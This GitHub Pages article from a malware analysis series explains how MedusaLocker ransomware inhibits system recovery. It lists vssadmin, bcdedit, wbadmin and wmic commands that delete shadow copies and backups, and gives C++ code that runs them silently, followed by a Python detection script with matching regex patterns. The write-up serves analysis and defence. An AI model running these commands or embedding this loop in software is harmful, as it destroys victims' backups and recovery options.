MalwareAnalysisSeries

This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the repo contains extracted TTPs with code along with the detection rules


Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

MedusaLocker: Inhibit System Recovery

MedusaLocker Image

Ransomware often deletes shadow copies and backups to maximize the pressure on victims to pay the ransom. By removing these recovery options, attackers ensure that victims cannot restore their systems and files independently, making the encryption irreversible without the decryption key. This increases the urgency and desperation of victims, compelling them to comply with the ransom demand to regain access to their critical data. Leveraging the absence of recoverable backups in this way raises the likelihood of payment, making ransomware attacks more successful and profitable for cybercriminals.

MedusaLocker also executes a series of shadow copy and backup deletion commands to ensure the maximum impact on infected systems.

Implementation

List of commands

const WCHAR* commands[] = {
    L"C:\\Windows\\System32\\vssadmin.exe Delete Shadows /All /Quiet",
    L"C:\\Windows\\System32\\bcdedit.exe /set {default} recoveryenabled No",
    L"C:\\Windows\\System32\\bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    L"C:\\Windows\\System32\\wbadmin DELETE SYSTEMSTATEBACKUP",
    L"C:\\Windows\\System32\\wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest",
    L"C:\\Windows\\System32\\wbem\\wmic.exe SHADOWCOPY /nointeractive"
};

Command Execution

Each command is executed with CreateProcessW and started as a separate process. CreateProcessW may modify the command-line buffer it is given, so the command is first copied into a std::wstring and the pointer to its writable buffer (strPtr) is passed rather than the string literal.

bSuccess = CreateProcessW(NULL, strPtr, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
if (!bSuccess) {
    std::cout << "Failed to execute command !!!" << std::endl;
    continue;
}

Execute all commands

All of the commands are then executed in a loop, each started as a separate process, to emulate the Inhibit System Recovery (MITRE ATT&CK T1490) behavior of MedusaLocker ransomware.

// Declarations used by the loop (declared earlier in the full source)
STARTUPINFOW si = { sizeof(si) };   // cb must hold the structure size
PROCESS_INFORMATION pi = { 0 };
DWORD exitCode = 0;
BOOL bSuccess = FALSE;
const int commandCount = sizeof(commands) / sizeof(commands[0]);

for (int i = 0; i < commandCount; i++) {
    // CreateProcessW may write to lpCommandLine, so copy into a writable buffer
    std::wstring str = commands[i];
    LPWSTR strPtr = &str[0];

    bSuccess = CreateProcessW(NULL, strPtr, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    if (!bSuccess) {
        std::cout << "Failed to execute command !!!" << std::endl;
        continue;
    }

    // Block until the child process exits, then read its exit status
    WaitForSingleObject(pi.hProcess, INFINITE);
    GetExitCodeProcess(pi.hProcess, &exitCode);
    if (exitCode == 0) {
        std::cout << "Command executed successfully: " << ConvertWCHARToString(commands[i]) << std::endl;
    }
    else {
        std::cout << "Command executed with exit code: " << exitCode << " - " << ConvertWCHARToString(commands[i]) << std::endl;
    }

    // Release the process and thread handles returned by CreateProcessW
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}
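The detection side of this TTP, as an added example that is not part of the repository's code: process-creation records (the fields Sysmon Event ID 1 and Security event 4688 provide) are scanned for the command patterns listed above and grouped by parent process, so that the chained sequence MedusaLocker emits stands out from a lone administrative "vssadmin list shadows". The log lines, field layout and rule names are constructed for this example.

```python
import re
from collections import defaultdict

# Detection patterns for the MedusaLocker command list above (ATT&CK T1490,
# Inhibit System Recovery). Keys are rule names; values match a process command line.
T1490_PATTERNS = {
    "vssadmin_delete_shadows": r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b",
    "bcdedit_recovery_disabled": r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b",
    "bcdedit_ignore_boot_failures": r"\bbcdedit(\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b",
    "wbadmin_delete_systemstate": r"\bwbadmin(\.exe)?\b.*\bdelete\s+systemstatebackup\b",
    "wmic_shadowcopy": r"\bwmic(\.exe)?\b.*\bshadowcopy\b",
}
T1490_COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in T1490_PATTERNS.items()}

# Constructed process-creation records in a simplified key=value form (not real telemetry).
SAMPLE_LOG = r'''
ts=1 ParentProcessId=4120 ParentImage=C:\Users\bob\Downloads\invoice.exe Image=C:\Windows\System32\vssadmin.exe CommandLine="C:\Windows\System32\vssadmin.exe Delete Shadows /All /Quiet"
ts=2 ParentProcessId=4120 ParentImage=C:\Users\bob\Downloads\invoice.exe Image=C:\Windows\System32\bcdedit.exe CommandLine="C:\Windows\System32\bcdedit.exe /set {default} recoveryenabled No"
ts=3 ParentProcessId=4120 ParentImage=C:\Users\bob\Downloads\invoice.exe Image=C:\Windows\System32\bcdedit.exe CommandLine="C:\Windows\System32\bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
ts=4 ParentProcessId=4120 ParentImage=C:\Users\bob\Downloads\invoice.exe Image=C:\Windows\System32\wbadmin.exe CommandLine="C:\Windows\System32\wbadmin DELETE SYSTEMSTATEBACKUP"
ts=5 ParentProcessId=4120 ParentImage=C:\Users\bob\Downloads\invoice.exe Image=C:\Windows\System32\wbem\wmic.exe CommandLine="C:\Windows\System32\wbem\wmic.exe SHADOWCOPY /nointeractive"
ts=6 ParentProcessId=880 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\vssadmin.exe CommandLine="vssadmin list shadows"
ts=7 ParentProcessId=990 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\bob\notes.txt"
'''

RECORD_RX = re.compile(r'ParentProcessId=(?P<ppid>\d+) ParentImage=(?P<parent>\S+) Image=(?P<image>\S+) CommandLine="(?P<cmdline>[^"]*)"')

def parse_records(log_text):
    """Yield a dict with ppid, parent, image and cmdline for each well-formed line."""
    for line in log_text.splitlines():
        m = RECORD_RX.search(line)
        if m:
            yield m.groupdict()

def match_rules(cmdline):
    """Return the names of every T1490 rule whose pattern matches the command line."""
    return [name for name, rx in T1490_COMPILED.items() if rx.search(cmdline)]

def detect_inhibit_recovery(log_text, min_distinct_rules=2):
    """Group rule hits by parent process id; report parents that trigger at least
    min_distinct_rules different rules, keyed by parent image path."""
    hits, parents = defaultdict(set), {}
    for rec in parse_records(log_text):
        for name in match_rules(rec["cmdline"]):
            hits[rec["ppid"]].add(name)
            parents[rec["ppid"]] = rec["parent"]
    return {parents[p]: sorted(r) for p, r in hits.items() if len(r) >= min_distinct_rules}

if __name__ == "__main__":
    for parent, rules in detect_inhibit_recovery(SAMPLE_LOG).items():
        print(f"ALERT T1490: {parent} spawned {len(rules)} recovery-inhibiting commands: {rules}")
```

The threshold of two distinct rules per parent is a tuning choice; lower it to one to surface every hit and review the parent image manually.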

Find the complete code here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

Intended for educational purposes only!